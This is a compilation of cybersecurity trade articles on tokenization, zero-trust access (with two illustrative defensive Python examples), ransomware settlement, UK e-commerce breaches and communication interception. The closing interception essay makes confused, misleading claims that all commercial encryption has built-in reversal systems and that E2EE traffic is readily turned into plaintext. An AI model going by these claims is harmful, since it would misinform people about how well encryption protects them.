Robert A. Eckel is the Chief Executive Officer & President of Aware, Inc. He also serves on the board of directors for the International Biometrics + Identity Association (IBIA), as a strategic advisory board member of Evolv Technology, and as a consultant for Digimarc Corporation. Over his distinguished career, he has held many positions of note within the biometric and identity space, including: Regional President and Chief Executive Officer of IDEMIA’s NORAM Identity & Security division from 2017 to 2018; President and Chief Executive Officer of MorphoTrust USA, LLC from 2011 to 2017; Executive Vice President and President of the Secure Credentialing Division of L-1 Identity Solutions Company from 2008 to 2011; and President of the Identity Systems division of Digimarc Corporation from 2005 to 2008. Mr. Eckel received his Master’s degree in Electrical Engineering from the University of California Los Angeles, and his Bachelor’s degree in Electrical Engineering from the University of Connecticut. Robert can be reached online on LinkedIn and at our company website: https://www.aware.com/


Businesses Must Protect Their Most Critical Asset: Their Data By Trevor J. Morgan, Ph.D., Product Manager at comforte AG

Protecting sensitive data is a challenge facing every business and enterprise. The value of data is rising to the extent that it is often referred to as ‘the new gold’ and a fundamental business asset. This value naturally means that many criminals are turning their efforts to focus on procuring the highly sensitive personally identifiable information (PII) handled and processed by companies. While data is very dynamic, it is essential to ensure that it is secured across all stages of its lifecycle. This is especially true as many companies prioritize network agility and digital transformation over data security in an effort to continue business operations through workforce enablement. In fact, according to the KPMG CIO Survey 2020, this year has seen innovation taking greater priority alongside improving security; however, “cybersecurity can sometimes become a secondary priority.” Yet, if enterprises wish to stay on the right side of data security regulations, then protecting the data itself is imperative. In fact, budgetary shifts across many industry verticals have resulted in more money being focused on securing the crown jewels of PII.

One alarming trend is that data is increasingly shifting from secured corporate networks to private servers as the trend towards home working continues. This has resulted in a widespread distribution of data within unsecured environments, ultimately meaning a loss of data control and security. If this data were to fall into the wrong hands by any means (unintentional leak or concentrated intentional attack), then the consequences would be massive. Not only would it negatively impact brand perception, but it could also result in compliance penalties from regulating bodies and severe loss of trust from savvy customers who are becoming more aware of just how valuable their data is. Regardless of how a breach happens, be it by a careless employee or malicious criminal intent, the consequences unfortunately remain the same. Therefore, business decision-makers should ensure that systems and mechanisms are in place that supersede traditional security measures. Instead of protecting siloed data at rest, or simply protecting corporate networks with a firewall, businesses should pivot to protect their most critical asset at the point of value: the data itself.

Why do hackers want my data?

The global pandemic has greatly altered the current state of data security. As workers migrate away from internal security processes within corporate networks (mostly access- and perimeter-based), the availability of data stolen and harvested on the dark web has increased exponentially in the past few months. In fact, the cost of data on the dark web has plummeted by up to 60% as of October 2020, and as of December, PII is being sold on the dark web for as little as 50 cents (USD). This perceived commoditization poses several questions. Primarily, if data is the new gold, why is obtaining it so cheap? The biggest reason that so much of this data has not been taken advantage of is the relatively low transaction volume resulting from pandemic restrictions.

The biggest challenge that enterprises face is to understand where their data is held, who has access to it, and where it is stored. Organizations must seek out and discover their data, be it structured (in a database) or unstructured. This will not only provide security teams with a holistic understanding of their current data security posture, but it will also assist with regulatory compliance and auditing. Only by undertaking this procedure will enterprises be able to properly secure data, as you cannot defend what you cannot see. This exercise of data discovery is a deliberate attempt to know the unknowns within the total data environment.

Data is a highly mobile and dynamic asset that crosses the traditional boundaries of on-premise and cloud. Often it’s a hybrid approach, existing somewhere in both environments. This situation requires a security strategy that prioritizes the data instead of access to it or the borders around it. The only solution is to protect the data itself and not just the perimeters around it. This data-centric approach to security focuses on the focal point that criminals are striving to attack, removing the incentive for cybercriminals: if the data is protected, it is ultimately worthless to them because it cannot be leveraged.

Protecting PII

But how can businesses look to deploy data-centric security to their advantage? The most widely accepted solution when it comes to data-centric security is tokenization. In plain terms, tokenization replaces PII data with a substitute representational token. This means that protected, tokenized data is still available for analytical purposes and other aspects of corporate workflows, but in the wrong hands it has no discernible meaning and thus no value. Because it cannot be transformed back into plain text, even if this data were misplaced or mishandled, the pseudonymized data would not be considered punishable under CCPA. Regulatory compliance is still met.


Tokenization also allows businesses to protect data upstream, allowing downstream applications and systems to inherit protection and close security gaps across the enterprise. Referential integrity means the protected values can be used for analytics without the need to de-protect the data, passing all system and validity checks across the system. This condition helps to meet another best practice in data security, which is to avoid de-protecting data as much as possible.

Currently, organizations spend considerable money in order to reduce risk, be it in the form of endpoint and mobile protection, cloud security, app security, or network defense. These traditional perimeter-based security methods only protect against known attack vectors, meaning that it is impossible to totally prevent data breaches and mitigate this threat with current piecemeal security approaches.

In fact, further benefits of deploying data-centric security, and in particular tokenization, include a clear return on investment. This approach to security offers more comprehensive coordination when it comes to complying with industry regulations. Indeed, for PCI DSS, such an approach can save thousands or even millions in audit costs and time. Furthermore, where data protection is considered your responsibility (and this is always the case with data you process and store in the cloud), data-centric security offers peace of mind by protecting against data breach or loss of data.

For security teams struggling to enact digital transformation, trying to ensure network agility, and laboring to prevent embarrassing data breaches, data-centric security is a promising solution. It’s also one that can be deployed in weeks rather than months or years, without modification to existing applications and workflows. So, what’s stopping you from taking the fundamental step of protecting your data with data-centric security?
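As an added illustration of the tokenization and referential-integrity points above (example code written for this article, not comforte’s product): a small vault-based tokenizer for card numbers. Each token keeps the BIN and last four digits, is made Luhn-valid so it passes the same format checks as a real PAN, and is consistent per PAN, so spend-per-customer analytics run on tokens give the same answer as on clear data without ever de-protecting; the key, the test PANs and the transactions are constructed assumptions.

```python
"""Constructed example: vault-based tokenization of card numbers (PANs).

A token keeps the BIN (first 6) and last 4 digits, replaces the middle
digits with values derived from a keyed hash, and is made Luhn-valid so it
passes the same format checks as a real PAN. The clear PAN exists only in
the vault; analytics downstream run on tokens and never de-protect.
"""
import hashlib
import hmac
from typing import Dict, List


def luhn_valid(digits: str) -> bool:
    """True when the digit string passes the Luhn check (sum mod 10 == 0)."""
    if not digits.isdigit():
        return False
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:            # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


class TokenVault:
    """Holds PAN<->token mappings; the only component that sees clear PANs."""

    def __init__(self, key: bytes):
        self._key = key                       # constructed demo secret
        self._pan_to_token: Dict[str, str] = {}
        self._token_to_pan: Dict[str, str] = {}

    def tokenize(self, pan: str) -> str:
        if len(pan) != 16 or not luhn_valid(pan):
            raise ValueError("expected a Luhn-valid 16-digit PAN")
        if pan in self._pan_to_token:         # referential integrity: same PAN, same token
            return self._pan_to_token[pan]
        head, tail = pan[:6], pan[-4:]
        for attempt in range(100):
            # Keyed hash seeds the middle digits; the counter resolves rare collisions.
            mac = hmac.new(self._key, f"{attempt}:{pan}".encode(), hashlib.sha256).digest()
            middle = str(int.from_bytes(mac[:8], "big") % 100_000).zfill(5)
            body = head + middle              # 11 digits so far
            # Digit 12 is not doubled by Luhn, so exactly one choice makes the token valid.
            token = next(body + d + tail for d in "0123456789" if luhn_valid(body + d + tail))
            if token != pan and token not in self._token_to_pan:
                break
        else:
            raise RuntimeError("could not derive a collision-free token")
        self._pan_to_token[pan] = token
        self._token_to_pan[token] = pan
        return token

    def detokenize(self, token: str) -> str:
        """Only the vault can reverse a token; analytics code never calls this."""
        return self._token_to_pan[token]


# Constructed transactions using well-known test PANs (not real cards).
SAMPLE_TRANSACTIONS: List[dict] = [
    {"pan": "4111111111111111", "amount": 20.00, "merchant": "grocer"},
    {"pan": "5555555555554444", "amount": 12.25, "merchant": "fuel"},
    {"pan": "4111111111111111", "amount": 35.50, "merchant": "pharmacy"},
]


def tokenize_records(vault: TokenVault, records: List[dict]) -> List[dict]:
    """Protect upstream: downstream consumers receive tokens, never the PAN field."""
    out = []
    for r in records:
        protected = {k: v for k, v in r.items() if k != "pan"}
        protected["token"] = vault.tokenize(r["pan"])
        out.append(protected)
    return out


def spend_by_customer(records: List[dict], key: str) -> Dict[str, float]:
    """Aggregate spend per customer identifier; works on 'pan' or 'token' alike."""
    totals: Dict[str, float] = {}
    for r in records:
        totals[r[key]] = round(totals.get(r[key], 0.0) + r["amount"], 2)
    return totals


if __name__ == "__main__":
    vault = TokenVault(b"constructed-demo-key-do-not-reuse")
    protected = tokenize_records(vault, SAMPLE_TRANSACTIONS)
    for row in protected:
        print(row)
    print("spend by token:", spend_by_customer(protected, "token"))
```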

About the Author

Trevor J. Morgan is responsible for product management at comforte AG (https://www.comforte.com/), where he is dedicated to developing and bringing to market enterprise data protection solutions. He has spent the majority of his career in technology organizations bringing to market software, hardware and services for enterprise and government customers. Trevor has held senior-level, lead positions in sales engineering, product management, software architecture and product marketing in companies like Cisco, Capital One and Ciena. He holds a Ph.D. from Texas Tech University and a bachelor’s and master’s from Baylor University. Trevor can be reached online at https://www.linkedin.com/in/trevor-j-morgan-ph-d-8b663515/


Zero Trust Remote Access for Engineering Teams By Colin Rand, VP of Engineering, Banyan Security

Engineering organizations present numerous challenges for security programs when it comes to remote access. They need secure access to dynamic hosts, services, and applications to productively do their jobs. The infrastructure these teams require is varied, ranging from external SaaS to internally hosted web services for wikis, git and build servers, various TCP services such as SSH and RDP, as well as database access and recently a huge wave of Kubernetes. These services are complex and often undocumented, especially as projects are under active development before they reach production environments. Securing these critical R&D assets arguably makes an Engineering org the most challenging department that InfoSec teams have to manage.

VPNs, falling short of today’s security requirements with their “one size fits all” strategy, are often at the core of serious usability, manageability, and security issues.

Let’s look at an infrastructure example. Most organizations use a sequence of VPNs, bastion hosts, and firewalls to manage network connectivity from user to server. Then, they use some combination of directory services and authentication managers to manage credentials so the user can authenticate into the server itself. Lots of moving parts, lots of available attack surface for the bad guys, and this is but a single use case.


Lately, Zero Trust is all the buzz, and for good reason. With a Zero Trust security posture, the user and device are explicitly authenticated and access is granted only for the specific server (without broad network access). By leveraging the organization’s IDP for authentication and issuing short-lived certificates with the user’s entitlements, connectivity is set up on-demand, eliminating the risk associated with static passwords and credential leakage. Real-time trust scoring enforcement allows for dynamic security policies that can be customized based on the sensitivity of server environments.

Let’s discuss some remote access challenges felt by engineering teams that are beautifully solved with a Zero Trust solution.


VPN Challenges

While access challenges cause pain and suffering to all end users, they can and do present serious issues for development teams. And, engineers, being smart and loving a challenge, unfortunately often work around those issues. Take these two anecdotes from a veteran engineering leader that highlight what goes wrong in the pits of engineering when remote access fails us – I suspect you’ll recognize the themes.

In one particularly locked-down engineering environment, developers had no access to production, no development environments were accessible without a VPN, etc. An enterprising developer who wanted to do some prototyping work from home decided that the VPN was too troublesome, so of course the dev just copied “his” source code, uploaded it to Google Drive, downloaded it onto his personal workstation at home, and... you can see where this is going. The lesson – the desire to be productive was treated as more important than pesky security policy, and a big security hole was created as a result.

Another time an engineer, having heard about new policies coming he didn't want to deal with, set up his own private bastion host in production. Of course, he didn't tell anyone, and soon after ended up leaving the company’s employment. Later, over drinks with a former colleague, he reminisced about what he had done, laughing about how they could still get into production anytime they wanted.

No More Excuses

Different teams have different remote access needs. All security teams think through the process of what resources are being protected, their sensitivity, and what is at risk of misuse. They have sophisticated means for analyzing risk profiles, but suffer with a blunt tool for handling the needs of the modern “remote-first” engineer. These design decisions become tradeoffs for what work needs to be done – criticality and time sensitivity of the task vs. the risk that is introduced. Yesterday we were concerned about 'where' the work needed to be done. Today that is irrelevant; it's anywhere and everywhere.

Engineers are Engineers, right?

Go into a modern software engineering organization and you will see many teams and activities being performed. To name a few:

• Site Reliability Engineer (SRE)
• DevOps
• Apps & Services
• QA/Test
• Data Engineering
• Data Analytics

Each team needs to be reviewed from a security perspective to determine what is the least privileged access that they need to perform their roles. Each needs their resources protected, their devices secured, and their identities validated. Once confirmed, they can perform their critical work. Safety first!

If only it were that easy. Each team has many similarities at a high level, but get into the details and their needs begin to diverge, often widely.

What is different about them?


Let's look at what's the same. They all have a wide assortment of 'things' they need to access that require protection. These 'things' include various TCP services (SSH), web apps and APIs (internally hosted or in the public cloud), SaaS, and oh yeah, throw in Kubernetes too.

The type of access each team needs is quite different. Perhaps your SRE needs access to production environments to see why a load balancer is misbehaving, but does the on-call developer supporting them also need this access? The DevOps team wants access to the build and development tools, such as the git and build servers, plus cloud environments, but should they have full access to production?

Another team, QA, needs to replicate issues found in production in production-like environments. They may need access to the hosts the services run on, or perhaps the databases themselves. But do they get access to the build tooling? What if the QA team is a subcontractor?

Each access decision requires discussion and design. What was previously one size fits all now works for none.

When thinking about the design, fine grain controls need to be implemented for each team, considering the sensitivity of the activity. Is production access needed, or is production data needed but not the rest of the infrastructure? The traditional hard boundaries of physical networks are now messy.

Let's look at a data engineering scenario. A production warehouse will have collection, aggregate, and analysis workloads. This might be implemented as a combination of cloud infrastructure, 3rd party SaaS tools, and internally-developed applications. When a new engineer is onboarded, security factors to consider with regard to access control include whether their device is compromised, or whether its disk is encrypted. Do you want to allow the engineer to pull sensitive data onto such a device, not knowing the state of its security? Perhaps a better path is allowing them to access a reporting UI from a personal device, while no data-level queries can be run. That might be a good alignment of risk vs. task disruption.
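The explicit per-request model described earlier (IdP-authenticated identity, access to one resource at a time, trust scoring, short-lived grants) applied to the data engineering scenario above, as an added example written for this article and not Banyan Security’s product code: the resource inventory, tiers, team entitlements, device postures, scoring weights and the fixed clock are all constructed assumptions.

```python
"""Constructed zero-trust access decision (example, not Banyan's product code).

A request carries an identity already authenticated by the IdP, the team it
belongs to, the resource and action wanted, and the device's posture. Access
is per resource and per action, gated by a device trust score against the
resource's sensitivity tier, and every grant is short-lived.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Dict, FrozenSet, Optional

# Assumed inventory: resource -> sensitivity tier.
RESOURCES: Dict[str, str] = {
    "prod-lb-host": "high",    # production load balancer host (SSH)
    "warehouse-db": "high",    # data warehouse, row-level queries
    "report-ui":    "low",     # dashboards over aggregated data only
    "git-server":   "medium",
    "build-server": "medium",
    "staging-db":   "medium",
}

# Minimum device trust score a tier demands (assumed thresholds).
TIER_MIN_TRUST = {"low": 30, "medium": 60, "high": 90}

# Least-privilege entitlements per team: resource -> allowed actions (assumed).
ENTITLEMENTS: Dict[str, Dict[str, FrozenSet[str]]] = {
    "sre":      {"prod-lb-host": frozenset({"ssh"}), "warehouse-db": frozenset({"read"})},
    "devops":   {"git-server": frozenset({"read", "write"}), "build-server": frozenset({"read", "write"})},
    "data-eng": {"report-ui": frozenset({"view"}), "warehouse-db": frozenset({"query"})},
    "qa":       {"staging-db": frozenset({"read"})},
    "apps":     {"git-server": frozenset({"read", "write"})},
}

DEFAULT_TTL = timedelta(minutes=15)                        # grants expire; nothing static
NOW = datetime(2021, 1, 15, 9, 0, tzinfo=timezone.utc)    # fixed clock for the demo


@dataclass(frozen=True)
class DevicePosture:
    managed: bool          # enrolled in MDM / known to the org
    disk_encrypted: bool
    os_patched: bool
    edr_healthy: bool      # endpoint agent reports no compromise indicators


def trust_score(d: DevicePosture) -> int:
    """0..100. A compromise signal from EDR zeroes the score regardless of the rest."""
    if not d.edr_healthy:
        return 0
    return (40 if d.managed else 0) + (30 if d.disk_encrypted else 0) + (30 if d.os_patched else 0)


@dataclass(frozen=True)
class Grant:
    user: str
    resource: str
    action: str
    issued_at: datetime
    expires_at: datetime

    def is_valid(self, now: datetime) -> bool:
        return self.issued_at <= now < self.expires_at


@dataclass(frozen=True)
class Decision:
    allowed: bool
    reason: str
    grant: Optional[Grant] = None


def decide(user: str, team: str, resource: str, action: str,
           posture: DevicePosture, now: datetime = NOW,
           ttl: timedelta = DEFAULT_TTL) -> Decision:
    """Explicit per-request check: entitlement first, then device trust, then a short-lived grant."""
    tier = RESOURCES.get(resource)
    if tier is None:
        return Decision(False, f"unknown resource {resource}")
    if action not in ENTITLEMENTS.get(team, {}).get(resource, frozenset()):
        return Decision(False, f"team {team} is not entitled to {action} on {resource}")
    score, needed = trust_score(posture), TIER_MIN_TRUST[tier]
    if score < needed:
        return Decision(False, f"device trust {score} is below {needed} required for {tier} tier")
    return Decision(True, "granted", Grant(user, resource, action, now, now + ttl))


# Constructed device postures for the walkthrough.
PERSONAL_LAPTOP = DevicePosture(managed=False, disk_encrypted=False, os_patched=True, edr_healthy=True)  # score 30
MANAGED_LAPTOP = DevicePosture(managed=True, disk_encrypted=True, os_patched=True, edr_healthy=True)     # score 100
FLAGGED_LAPTOP = DevicePosture(managed=True, disk_encrypted=True, os_patched=True, edr_healthy=False)    # score 0


if __name__ == "__main__":
    for args in [("dana", "data-eng", "warehouse-db", "query", PERSONAL_LAPTOP),
                 ("dana", "data-eng", "report-ui", "view", PERSONAL_LAPTOP),
                 ("dana", "data-eng", "warehouse-db", "query", MANAGED_LAPTOP),
                 ("omar", "apps", "prod-lb-host", "ssh", MANAGED_LAPTOP),
                 ("sam", "sre", "prod-lb-host", "ssh", FLAGGED_LAPTOP)]:
        d = decide(*args)
        print(args[:4], "->", "ALLOW" if d.allowed else "DENY", "|", d.reason)
```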

Each team has its own ecosystem of tools, each with its own quirks. (It's all software built on software after all.) Each time a different remote access strategy is involved, the engineer gets frustrated as more security workarounds are deployed, making for an increasingly fragile system that is more cumbersome to use. Want to eliminate shared passwords on that internally-hosted service that doesn't have SAML support? Want to make sure a particular API is accessed only by devices that are deemed secure?

Oh, and don't forget about handling contractor/third-party access. Or offshore teams. Or compliance…

Is it easy?

Is security easy? No. Is achieving “Zero Trust” easy? Certainly not at the boil-the-ocean level, but the good news is that a value-adding project with some sensible constraints is totally achievable. And doing so results in scalable identity-based access that factors in device health and security.

Step one is coming to grips with the challenge and deciding now is the time to take it on. Secure remote access platforms, like Banyan Security’s Zero Trust Remote Access Platform, exist that allow you to easily introduce zero trust, least privilege access in a consistent way across differing resources and heterogeneous infrastructure. Security dramatically improves. Usability, now consistent, becomes easy to the point of transparent.


My recommendation is to tackle a small project, perhaps just a few SSH hosts, maybe GitHub, or perhaps just getting better visibility into your devices. Understanding the challenge is the first step on the path and nothing beats a little hands-on prototyping.

About the Author

Colin Rand is the Vice President of Engineering at Banyan Security. He has extensive experience in engineering leadership and product development, working at a wide range of enterprise startups to late-stage and enterprise companies. Most recently Colin helped transform Delphix from an on-premise data management appliance to create their first SaaS offering, with an integrated product strategy to create a hybrid platform. Before then, he led the platform initiative for Lookout, a BeyondCorp mobile security company, managing data, identity, and security services for ML-based mobile threat protection. Colin’s wide experience brought him through Salesforce, AKQA (creative agency) as well as his own startups in NYC. Colin began his career as a hands-on developer after studying computer engineering at the University of Michigan.


Cryptocurrency Ransomware Is on The Rise During COVID-19 – Here’s What Businesses of All Sizes Need to Know About Dealing with Attacks By Marc Grens, Co-Founder & President at DigitalMint

Crypto-related ransomware attacks are on the rise, and the pandemic has only hastened their propagation. For example, from 2018 to 2020, ransomware attacks increased by 200%. Yet during the COVID-19 pandemic alone, from January to May of 2020, ransomware attacks grew by 900%. This is not surprising given the rise and vulnerabilities of remote work and individuals mixing their professional and personal lives online. Ransomware is a common cybersecurity threat facing a wide variety of industries, from public entities like government agencies and healthcare organizations, where confidential data storage is critical, to financial services and even manufacturing. Worse yet, a federal cybersecurity advisory committee has warned of an increased cybersecurity threat to hospitals even while dealing with the pandemic.

These types of attacks do not discriminate based on company size either. Small and mid-size businesses are at as much risk as large companies. And it is all only going to get worse in 2021 as technology continues to improve and advance. Hackers have become more emboldened and brazen, and unfortunately, some businesses continue to lag behind in cybersecurity precautions. Based on all this information, it is worth considering what steps leaders can take to deal with crypto-related ransomware attacks.

Cryptocurrency Ransomware Attacks: What You Can—and Should—Do

There are some steps you can take to either avoid a ransomware attack or, at the least, handle it with minimum damage to your company’s reputation, data, and fiscal health.

1. Train and educate employees about ransomware and how to avoid it—If your IT Department does not already have a set of cybersecurity training modules in place, consider building out a comprehensive program to educate employees about ransomware. Be sure to update the program regularly, as new developments in cybersecurity are rapid. In addition, stress to all your employees how serious ransomware can be.

2. Know that paying the ransom is a last-resort option—While there are plenty of ways to recover losses and deal with the ransom, such as employing companies like DigitalMint, which has used its cryptocurrency and financial networks to help clients settle cases with ransoms of more than $10 million in the past, you should know that in general, paying the actual ransom is the last resort. You should not immediately pay it without considering your other options and seeking professional technical advice to determine the damage that may have been done.

3. Hire a reputable cyber incident response firm with technical expertise —Once attacked by ransomware, remain calm and hire a reputable cyber incident response firm. They need to analyze the situation, assess the damage, understand how much data has been released, and advise you on how to proceed. This will not only include determining a strategy for handling the current ransomware issue, but it also will include remedying vulnerabilities in your system to prevent future attacks.

4. Avoid conflicts of interest—This is very important, possibly the most important point: avoid conflicts of interest, especially when dealing with the cryptocurrency ransom itself. There should be a clear separation between the cyber incident response firm and the cyber settlement financial services organization that acquires the cryptocurrency. It would be best if you chose a separate partner for each role in the process, because a cyber incident response firm that also deals with the financial payment side of things might have a conflict of interest that prevents them from doing the best possible job for you under the circumstances.

For instance, perhaps the cyber incident response firm knows how to get your data back without paying the ransom; if that consultant also handles your business's potential cyber settlement cryptocurrency purchase, why would they want to stop at the cybersecurity consultation step in the process if they are incentivized to purchase your settlement? Instead of solving the problem early in the process without a ransom payment, your consultant might be tempted to proceed with payment to receive an extra commission from you. That is why companies like DigitalMint focus solely on cyber settlement financial services, removing any conflict of interest.

5. Prevent financial red flags in cryptocurrency transactions—In many cases, especially with small and mid-size businesses, fast and large cryptocurrency transactions can be seen as suspicious by regulatory authorities and financial institutions. For that reason, you must prevent red flags with your transactions. Doing this includes:

● Banking transparency with settlements—Make sure your cyber cryptocurrency settlement partner company is transparent about its transactions and has a history of always rigorously recording documentation of all cryptocurrency transactions.

● Strong relationship with banks and firms who deal with cryptocurrency—Many smaller cryptocurrency settlement companies do not have partnerships with organizations that specialize or even deal in cryptocurrency. This is why your cyber settlement partner must already have those strong relationships with organizations that handle cryptocurrency transactions.

● Strong AML (Anti-Money Laundering) and other stringent compliance programs—Your cyber cryptocurrency settlement partner must always comply with AML, OFAC, and other federal and state regulatory guidelines. Since you are dealing with hackers, it can be easy to slip into non-compliant transactions, but if your cyber settlement partner is in compliance with the Anti-Money Laundering Program and other compliance programs, you will not be prone to sink to the hackers’ levels of unlawful behavior.

The Takeaway: Ransomware Does Not Have to Be the End of Your Company

While it is true that the growing threat of ransomware attacks continues to increase rapidly in the age of the COVID-19 pandemic—and was spiking at an alarming rate even prior to the pandemic—there are still some relatively simple steps you can take to prevent or minimize the damage to your company. However, if you choose to hire a trusted independent cyber incident response firm, ensure any conflicts of interest are mitigated or fully disclosed.

About the Author

Marc Grens is the Co-Founder & President of DigitalMint, a trusted cryptocurrency ransomware resolution provider that enables clients to purchase Bitcoin and other cryptocurrencies to settle ransomware incidents. He is a serial entrepreneur with more than 15 years of experience in the investment industry. Prior to DigitalMint, Grens held senior positions at Charles Schwab, HighTower Advisors, and Alpha Strategies. He received his M.B.A. from the Kellstadt Graduate School of Business at DePaul University in 2010, and a B.A. from Illinois State University. Grens is an active angel investor and serves on multiple advisory boards of companies in the Chicago tech community. Marc Grens can be reached at www.digitalmint.io.


E-Commerce and Lockdown: The Perfect Storm for Cyber Threats

The impact of lockdowns on cybersecurity

By Aman Johal, Lawyer and Director of Your Lawyers

The UK’s National Cyber Security Centre (NCSC) reported that a quarter of all cyberattacks over the past year are linked to the pandemic. Action Fraud, the UK’s National Fraud and Reporting Centre, disclosed that there have been over 16,300 successful cyber scams with losses amounting to £16.6m during the first lockdown period alone.

Research also revealed that 86% of consumers experienced some form of cybercrime during the pandemic as retailers turn to increased e-commerce out of necessity. Action Fraud found that people aged 18-26 were the most vulnerable to cybercrime on online shopping platforms, such as Depop and eBay, representing 24% of victims.


The second national lockdown in November pushed the nation back online for four more weeks, which served to increase cybersecurity risks once more. Black Friday, which took place on 27th November, was an additional factor, and phishing attacks reportedly increased by 336% when compared to previous years. In 2020, visits to e-retailers were up 35% year on year, inevitably correlating with a surge in cyberattacks and the risks that they pose.

And that is not the end of it. With the Christmas shopping season in full swing, further data has revealed that less than half of UK retailers feel that they have adequate cybersecurity measures in place. 45% believe that their third-party partners are not prepared either, a matter that has been a point of contention in the Ticketmaster data breach which involved a third-party vulnerability and exposed the personal information of 1.5 million UK customers.

The threat is so severe that the NCSC launched its Cyber Aware campaign in December to educate consumers and businesses alike about the online threat posed during the festive season. These cumulative factors are indeed a significant cause for concern. The lack of urgency among retailers and consumers to protect themselves against cyber threats, combined with the increasing sophistication of hackers who already have a wealth of practice from the first lockdown, has created a ticking time bomb.

Data breach: the straw that could break the camel’s back

It is critical that e-retailers deliver on their responsibility to protect customer data. Failure to do so could result in significant legal and financial repercussions.

The UK’s Information Commissioner’s Office (ICO) has the power to issue significant fines for data breaches in accordance with the GDPR. In October 2020, it issued its first two significant fines against British Airways (BA) and Marriott, at £20 million and £18.4 million respectively – although these figures do represent a disappointing climb-down from the original intention to fine in the sums of £183m and £99m. In addition to fines, businesses in breach of the GDPR may also face significant compensation pay-outs for damages. In the case of BA, they could be facing a total pay-out of as much as £3 billion based on an average possible claim of £6,000 for each of the estimated 500,000 victims.

Customer loyalty is also likely to take a hit following a cyberattack; an additional blow that the retail sector cannot afford to suffer in 2020. For the UK retail sector as a whole, sales decreased by 19.1% year on year during the first lockdown, and it is still struggling to recover. Cybersecurity must always be a financial priority for e-commerce platforms, as data breaches can cost far more on average than investment in preventative measures.

Despite a dismal outlook for the retail industry on the whole, consumers who are affected by a data breach this festive season should remember that they could be entitled to pursue compensation from the responsible party. The power of the law should act as an important deterrent for businesses adopting a complacent attitude towards their cybersecurity responsibilities, especially as we continue to see worryingly high numbers of cyberattacks with serious implications for millions of people in the UK.

The surge in cybercrime is unlikely to relent in the near future. With a looming recession predicted for 2021, businesses may be persuaded to cut their cybersecurity spending. It is essential that this does not happen: companies in the e-commerce sector, and beyond, must view cybersecurity as a non-negotiable asset.


About the Author Aman Johal, Lawyer and Director of Your Lawyers Aman founded consumer action law firm Your Lawyers in 2006, and over the last decade he has grown Your Lawyers into a highly profitable litigation firm. Your Lawyers is a firm which is determined to fight on behalf of Claimants and to pursue cases until the best possible outcomes are reached. They have been appointed to Steering Committee positions by the High Court of Justice against big corporations like British Airways - the first GDPR GLO - as well as in the Volkswagen diesel emissions scandal, which is set to be the biggest consumer action ever seen in England and Wales. Aman has also successfully recovered millions of pounds for a number of complex personal injury and clinical negligence claims through to settlement, including over £1.2m in damages for claimants in the PIP Breast Implant scandal. Aman has also been at the forefront of the new and developing area of law of compensation claims for breaches of the Data Protection Act, including the 56 Dean Street Clinic data leak and the Ticketmaster breach. Aman can be reached online at LinkedIn and at our company website: https://www.yourlawyers.co.uk/


Communication Streaming Challenges
By Milica D. Djekic

As is well known, there are many ways of tracking someone’s e-mail, chat or social media accounts. Defense professionals are familiar with these methods, and such hotspots can be used to discover new suspicious activity in cyberspace. Many transnational and terrorist groups use account tracking to stay updated on someone’s actions in the virtual domain. The key point about network traffic is that the data is put into packets that carry both sensitive payload and routing information. In other words, those packets travel from device to device over critical communications infrastructure. If computer breaches and account tracking are well-known ways of obtaining sensitive content, it is clear that there are further critical points in data exchange and storage. For instance, someone who wants to avoid the difficulty of breaching servers, datacenters and endpoints could instead try communications tracking in order to catch the information while it is in transit. In many cases that content is under a key, and some effort must be invested to decrypt the message and make it readable. In modern times, many communications channels began life as defense products and are today in full commercial use. Anything that is widely accessible has a counter-system so that it remains under the control of its creators. Apparently, no one will develop a solution that works on its own without being controllable by human beings. Next, the final product can do only what its developers defined it to do, and it cannot cope without its secret counter-weapon. So, if e-mail accounts, browsers and social media profiles have some kind of protection and are so appealingly commercialized, it is quite obvious that those advancements have reversible systems that make them manageable. The situation is similar with communications routes, which can be tracked using widespread monitoring tools. Even if the packets of information are well secured, they can be transformed into plaintext, as there are plenty of options on the marketplace for that purpose.

Devices in a network communicate with each other by following a certain set of rules. First, it is important to understand why communication protocols matter: they are of crucial significance for enabling traffic and exchanging information. In other words, if two devices follow those rules and their exchange is accurate, or proceeds as defined, they get permission to connect with one another and transfer data. Logically, that information is part of the communication channel, and in both policing and the military there can be someone who listens to the traffic and redirects samples of it to other machines. We call that operation tapping or streaming. Further, the exchanged information is secured with some sort of cryptography, so the streamer cannot be sure what it is all about. The point is that someone can breach network traffic just as it is possible to breach a device. On the other hand, once the traffic is streamed there can be a lot of work for a cryptanalyst, who needs to decrypt and analyze the content that was sent. From a security point of view, this matters because communication tracking can be used by illegal organizations to monitor someone’s activities on the web. As a consequence of such a campaign, many community members as well as their infrastructure can be at risk, because the bad guys can come into possession of confidential information. Across the globe there are many network monitoring applications that can be used for streaming and, with the support of some cryptanalysis effort, for reading the decrypted messages. Basically, the cryptanalyst is the person capable of transforming the packets of information into their plaintext form and making them accessible to the rest of the team.
The fact is that the cybercrime underworld has always been in a position to carry out this sort of operation, and it is undoubtedly a threat to communities, businesses and government assets. It appears that high-tech syndicates are a real global threat, especially bearing in mind that they can be a very dangerous weapon in the hands of other criminal and terrorist groups.

A packet of information is a complex set of bits that, depending on the position of the 0s and 1s in the array, can mean a lot in machine-language terms. The two basic parts of a data packet are the payload and the routing information, which respectively carry the message itself and the path the packet must follow in order to be delivered from the starting point to the final destination. A common type of cryptography these days is end-to-end encryption, or E2EE. That kind of encryption means the message is ciphered on one device, then packed into the payload bits and finally sent to the destination. The entire communication network is huge and very complicated, so to transmit the data it is necessary to follow some path while preventing the encrypted payload from being streamed and read along its route. The routing information, or path bits, serves to distribute packets better across the network. E2EE is one of the best-practice approaches in many competitive armies and policing units, as it provides quite reliable delivery of messages. That sort of cryptography, like anything else, has its strong and weak sides: as is well known, the message is encrypted on the initial device and decrypted at the final destination, which means that if those two devices are exposed, the enemy can come into possession of the accurate plaintext. Also, anyone who is channeling the communication asset can try to work out the accurate interpretation of the payload itself. In other words, good cryptanalysis requires advanced knowledge of computer science and engineering, and whatever passes through the channel is dealt with as an array of the packet’s bits. If we know the position of each bit in that array, we can make a choice between 0 and 1, so our chances of guessing a single bit correctly are even (half-half).
